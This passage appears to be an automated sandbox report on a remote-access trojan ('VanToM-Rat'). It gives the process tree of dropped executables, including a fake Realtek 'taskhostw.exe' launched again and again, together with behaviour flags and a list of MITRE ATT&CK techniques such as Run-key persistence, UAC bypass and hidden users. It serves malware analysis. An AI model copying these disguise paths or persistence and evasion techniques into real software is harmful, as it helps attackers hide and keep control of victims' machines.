- NTFS ADS
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:5240 -
C:\Users\Admin\AppData\Roaming\VanToM Folder\Server.exe"C:\Users\Admin\AppData\Roaming\VanToM Folder\Server.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:416
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\Downloads\VanToM-Rat(1).bat1⤵PID:4656
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\VanToM Folder\Server.exe1⤵PID:508
-
C:\ProgramData\Windows\rutserv.exeC:\ProgramData\Windows\rutserv.exe1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2612 -
C:\ProgramData\Windows\rfusclient.exeC:\ProgramData\Windows\rfusclient.exe2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4052 -
C:\ProgramData\Windows\rfusclient.exeC:\ProgramData\Windows\rfusclient.exe /tray3⤵
- Executes dropped EXE
- Suspicious behavior: SetClipboardViewer
PID:2180
-
-
-
C:\ProgramData\Windows\rfusclient.exeC:\ProgramData\Windows\rfusclient.exe /tray2⤵
- Executes dropped EXE
PID:2584
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:5272
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
- Drops file in Windows directory
PID:2708
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -s TermService1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4104
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:5904
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵PID:3184
-
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵
- Executes dropped EXE
PID:4924
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:5808
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵PID:4980
-
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵
- Executes dropped EXE
PID:4196
-
-
C:\Programdata\RealtekHD\taskhostw.exe"C:\Programdata\RealtekHD\taskhostw.exe"1⤵
- Executes dropped EXE
PID:2676
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:4720
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵PID:2568
-
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵
- Executes dropped EXE
PID:3800
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:2224
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵
- Executes dropped EXE
PID:4520
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:4444
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵
- Executes dropped EXE
PID:1604
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:5476
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵
- Executes dropped EXE
PID:5480
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:3508
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵
- Executes dropped EXE
PID:4336
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:5904
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵
- Executes dropped EXE
PID:5012
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:1240
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵
- Executes dropped EXE
PID:5832
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:5772
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵
- Executes dropped EXE
PID:1560
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:2564
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵
- Executes dropped EXE
PID:5776
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:4484
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵
- Executes dropped EXE
PID:4220
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:5860
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵
- Executes dropped EXE
PID:3052
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:5984
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵
- Executes dropped EXE
PID:5216
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c1⤵PID:5456
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:5148
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵
- Executes dropped EXE
PID:3656
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:5904
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵
- Executes dropped EXE
PID:1412
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"1⤵PID:5964
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:6308
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵
- Executes dropped EXE
PID:6452
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:6356
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵
- Executes dropped EXE
PID:6436
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:7012
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵
- Executes dropped EXE
PID:7104
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:7072
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵
- Executes dropped EXE
PID:7112
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:904
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵
- Executes dropped EXE
PID:6800
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:6612
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵
- Executes dropped EXE
PID:6496
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:6788
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵
- Executes dropped EXE
PID:6708
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:6364
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵
- Executes dropped EXE
PID:6692
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:7104
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵
- Executes dropped EXE
PID:7080
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:7024
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵
- Executes dropped EXE
PID:3840
-
-
C:\Programdata\RealtekHD\taskhostw.exe"C:\Programdata\RealtekHD\taskhostw.exe"1⤵
- Executes dropped EXE
PID:4784
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:4988
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵
- Executes dropped EXE
PID:6436
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:5184
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵
- Executes dropped EXE
PID:6780
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:6756
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:6948
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵
- Executes dropped EXE
PID:6700
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:6400
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:5944
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:5016
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:3032
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:6860
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:3696
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:5964
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:6632
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:6248
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:6680
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:6420
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:3524
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:6956
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:4568
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:7080
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:3840
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:6968
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:6984
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:6156
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:6540
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:6492
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:6548
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:6812
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:6244
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:6568
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:6224
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:6580
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:3020
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:6672
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:6840
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:2980
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:7116
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:1412
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:7084
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:3068
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:1340
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:2456
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:6764
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:6452
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:6496
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:6648
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:3268
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:6164
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:6756
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:6948
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:6924
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:7112
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:6168
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:5956
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:2488
-
-
C:\Programdata\RealtekHD\taskhostw.exe"C:\Programdata\RealtekHD\taskhostw.exe"1⤵PID:2180
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:1828
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:4752
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:4140
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:7136
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:6440
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:6284
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:6608
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:6028
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:6652
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:6476
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:6848
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:6312
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:5132
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:6272
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:4928
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:1120
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\KdzEregli.exe1⤵PID:6724
-
C:\Windows\KdzEregli.exeC:\Windows\KdzEregli.exe2⤵PID:6240
-
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x4f8 0x3d01⤵
- Suspicious use of AdjustPrivilegeToken
PID:6496
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:6608
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:6816
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:4720
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:6796
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:3524
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:6572
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:1560
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:7088
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:7140
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:6400
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:2732
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:6956
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:5444
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:6784
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:1512
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:6196
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:6668
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:6692
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:6540
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:6244
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:5184
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:3524
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:6356
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:7116
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:6272
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:1120
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:832
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:6616
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:1512
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:5108
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:4072
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:6240
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:6604
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:6252
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:6824
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:6740
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:6312
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:4908
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:1752
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:5936
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:6560
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:5616
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:6744
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:6964
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Rundll32.exe1⤵PID:4472
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Rundll32.exe1⤵PID:4388
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Rundll32.exe1⤵PID:1120
-
C:\Programdata\RealtekHD\taskhostw.exe"C:\Programdata\RealtekHD\taskhostw.exe"1⤵PID:3704
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:4752
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:1828
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:536
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:5964
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:6720
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:1740
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:6216
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:6404
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:6948
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:7080
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:6724
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:6940
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:4460
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:1080
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:6356
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:5732
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
3JavaScript
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1System Services
1Service Execution
1Persistence
Account Manipulation
1Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Create or Modify System Process
3Windows Service
3Event Triggered Execution
2Change Default File Association
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Server Software Component
1Terminal Services DLL
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Account Manipulation
1Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Create or Modify System Process
3Windows Service
3Event Triggered Execution
2Change Default File Association
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1File and Directory Permissions Modification
1Hide Artifacts
4Hidden Files and Directories
3Hidden Users
